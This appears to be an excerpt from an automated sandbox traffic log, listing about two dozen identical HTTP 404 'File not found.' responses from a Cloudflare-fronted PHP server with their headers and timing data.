            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c4hH7Dga76KwjXgKvLOZNXoInVKXMkyvOHddZa4qLgBgSpSJrjqFnnacbzJsi3QRRSpWFYaQ3Gnrpwat%2FbSARNJHO0%2B7OZOW2PMBI7XUqyx1uHZtxSL2ifDOj14%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f74fabccb436f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1615&rtt_var=807&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=418&delivery_rate=0&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aPgwR6I2h0eRD5CT9S1EEoRumD2VPaWhP9Laqk0drlQk0rFY2EY3b%2Fghs3h%2Fz0wxZaPK1DZCl1Z8NLdRijZ27WUW1Mb81KawC%2FE4B7xZtGjiichJ86%2BHnuN5K%2BQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f75017be843f7-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2314&min_rtt=2314&rtt_var=1157&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wBKWkwj4CVcCj5OIqTkW6KWmk%2BYZBJpiJSHMDITVn9AcDoUTS%2BWGUAfXE3%2FncjjZ4O5duqPP4GruCdYDEF31nnxNw2PCGE%2F1OAZ9dNCP%2B5jxoxlKse0dXJYGQdM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f75075bb74374-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1606&rtt_var=803&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=65&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mkDCGIQKKDGK0nz1d6MAZ7kqhq%2FBXWbhj9xM%2F2KFu2iUAWG1ZqYwRrXGYwZSGhZhGEgE%2Bzf3MrgF%2Bl5qL1dvODzJIlNk7%2BtApnX4beyFR5D9qNA%2F6b82VZin%2BtM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f750d9b0343d4-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1605&rtt_var=802&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pOTaCP9JyXQ4jhhrkQhELCgXizzs5k0QX2Nr8suSN79SWQCtntlaqU5OZ8yCGugN5%2Fwx1m5K1CwF75AsxDbH7onP04Qr7FASnAYk8t6J9dBy%2BcehQbBwOxgSza4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f7513cbd24219-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1626&min_rtt=1626&rtt_var=813&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IgakNY1fmoxSFqoqOebjQMJrpXtQSfbdgVDG%2Bfccr7xO%2FYoAzNpb5boaXB54L1VZi3Dy9%2B6vgS796Dm2jwcRC5OCVNVFtYO0bvVMVNaPTeAYPJZTIsdZ%2F%2F8tZKI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f751f7c4b42ad-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2377&min_rtt=2377&rtt_var=1188&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hf73T2szNtcldfbHI3k0dM%2FXDn5V7u7GPM7XgCL97tJCxkBkGwgpGDM5gJ7fk10aEVEPEabU5U%2Fwk0E%2Fl6ku334wtGYxQLHtc8YbaUVkyHxT2eC3YEOuW0wPgjU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f752538e54366-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1614&min_rtt=1614&rtt_var=807&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8En172Js2i0nSoCwFacfF2yteOmiQgo1CzCzi4EjT9aZznrMa6eawrcD91y6vnsF1oRo8ZgyZmV%2BdJVIZR3w8pXvflPR1K0JoEe0LkDUrjaTi6XlHmVfj%2Fb%2FUrc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f752afc7f0f59-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1648&rtt_var=824&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TZJK2KM1IGgCUXEDDxDYo5%2BwoAwQ0mGWRSSSEq3Rh3Eqljv9vK4W7LGq6Ikgy7cib%2FnRnG4%2F4lmONUqeNpbH1tAENpzlnBMLh%2FlFNkGUrkWo6hSXCAdzuUSK%2FS0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f7530eaa5f799-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=11233&min_rtt=11233&rtt_var=5616&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=183&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kNsGwYumvr121feXb3uCf5X5x5PCucq1HLRVCSrbWuEvx%2BoxZ0lgVL4wAURaqw28YwCt3xulowlQ0FkAchqLmX7Ryir2YX89p4xPrDZhXQPDPTl1amXmzgVfujE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f75371f5272b9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1797&min_rtt=1797&rtt_var=898&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RwVANxOFUtN1vDgAhBtRPIa6SYf4CsjquBKoyeIBsjcQ2Zqyd9460CoTA%2FSouF1SDTkNm8ByJJijTu7JUODnJyqQ6WTmqzuRq6v1a9fot3BWCYwMTEAVBBonLBw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f753dbe2041a9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1698&min_rtt=1698&rtt_var=849&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oCqGINKfJ4UZSrD4S1KRxAd13IIitgavuZYKa%2BeI9kWXxA4yOYn5Oleb13yOPGrN7Sex2RatBzADUKHwXwMCEUEZAW%2ByG8HI7p69PicoZi8cDOaJY7%2FVp4QMJ1A%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f7543a8687cfa-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1855&min_rtt=1855&rtt_var=927&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S8xWI6JbBoGcD8DiYVdWlhSl%2FCsV7psDvroW4yMsvB9xPJaAKaGLUgfRzR1KRj3eIBiQB8Q4BGSsJpjwHM%2FYOoxrHRYy%2F5NVd%2F2jplpnkGwB0pL85t%2BvG87vxdE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f754f9f9941ed-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1777&min_rtt=1777&rtt_var=888&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PwRggHcy8Ud9%2BiivdRTCD8yDKA%2BLPObVsl2J9cPUaSWHk%2FiEBfZa%2FYdKpp3pFVQzUCk6ufww8ZESR39nP01z5fp7wf4TbhOJ%2Bq%2BdG%2Bbe3MIPaAmQ3Jbu6b8hK40%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f755b8cfb6a52-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2088&min_rtt=2088&rtt_var=1044&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SLCKiP7Sz8Zc0tw%2BiFdNmTJ8uQh%2FY3PtOhBm1MHKbUa2mOc25WCYzRUx9%2BIy9z2SHkL1uCkm1GlLKR5GZMd883E2EVw5CWupv1AlduhZMqHHRzDc1gU6ZRUiszc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f75616ee142a9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1831&min_rtt=1831&rtt_var=915&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=108&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fKXQ7p12DSFox5Nymi3Mv9%2B1r43tR5Yp6CLAXPnNKZxJwXVrLApSRXdjLn8ZizD2qOBwq%2FpAy9B%2FZRoB0BJ7OX4%2F%2BtQxcVtabsbpCDVc1MVGuJ0GG1GOf6Z5HN0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f756729c8c407-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1557&min_rtt=1557&rtt_var=778&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NruVIEUw43uH2%2FzW%2FcAy4VxM75y4p8wvTaPRyPfndwG%2FhTpYG15mhP7ZgjGkM96jrb3eUIysTxXs6dEExgHkl4HCo7qH8sbTEFwI0C6BHpbo0KJWzEj1y7AIdzk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f756d0a29728c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1985&min_rtt=1985&rtt_var=992&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=173&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CzA7UUijRFDKAu%2Be3Bx%2FOuoQbON5S9o%2B3PKtcMkbKo5KvfHZBUG87mTG%2F8pWjrqXlvX8ZOUoRMCdvgIY9KUAX84ssOtZ8PevvjzjQJoU7cIZyXo9%2B2JSvrKYdtc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f7572ed967ca2-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1831&min_rtt=1831&rtt_var=915&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cb8nzW0McbIecT6XC7w74acejfn31DhxFCqfdN1wmG1csjkuHbiMk6VLjUNFKrfcXgaKlzoxmPugfTxZhXEPljhyP%2FB2qRVTbIK%2BL%2FVwlVAmrxtXJGtNUQg%2Fdhg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f757e6b2b0f99-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1563&rtt_var=781&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xx31yNb02skbWT%2FXRmU01b3SZ2CD6AQmNNZTGch%2B1tqAudTfuu76P8xdnEWStorFJCHmWVVEUfZaRA1tPCxpjmpp8%2FXAXZH90Y9TjB%2F6P%2BsTzzVXtMpVqWqOPiM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f75845c5942af-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1711&min_rtt=1711&rtt_var=855&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=173&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KFMgqEARapK8fdTZgY0W5JdZ23ePYjx1bgFzdUGtl6AlPFg3fXaeisNPn5is%2FF9eGBpHRoQ6YjH0ddqo0RspDrLxNJbsjpFGq6tzhhxZQeww%2Bpsqww4j2pi5eRc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f7589496dc40e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1658&min_rtt=1658&rtt_var=829&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jdWHk4cFJTy4i2e7i5n67cPU%2Bg5pos6xl638FufFtZ14GbkT2LtdXapb9ODCXiPPEpWX8DRtONVbY0AeyNpB%2FkTerxhVy5ypFwzoKPPy%2BahtEeWmT69IAi3g9%2Fc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f7593cebe42e4-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1739&min_rtt=1739&rtt_var=869&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mn0QFyHXLxNB9I4vTBJg0xAhd6m%2BKcU3JhM0%2F%2BH6JbbFh9m%2Fon34ldKSDPaj9MdqMfPnYWw6FRgZycNje57DTi6mvLw0YG3tjSRn5go0lUzSY0DS%2FtLBqH5pc%2BU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f759e782943b9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1596&rtt_var=798&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:16:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ahkE2zZzcG%2BWB6%2BP1jwTFPe%2FC1sLgrE7PYzW0%2FJKHPcEJcb7curPTaocouwYVENq9U%2BZSJyYHYticvLMY%2FQUPUKCuCEKD5mmFakmI%2FrjHUlrYEHDrjdEdyWbcRs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f75a38954424f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2150&min_rtt=2150&rtt_var=1075&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
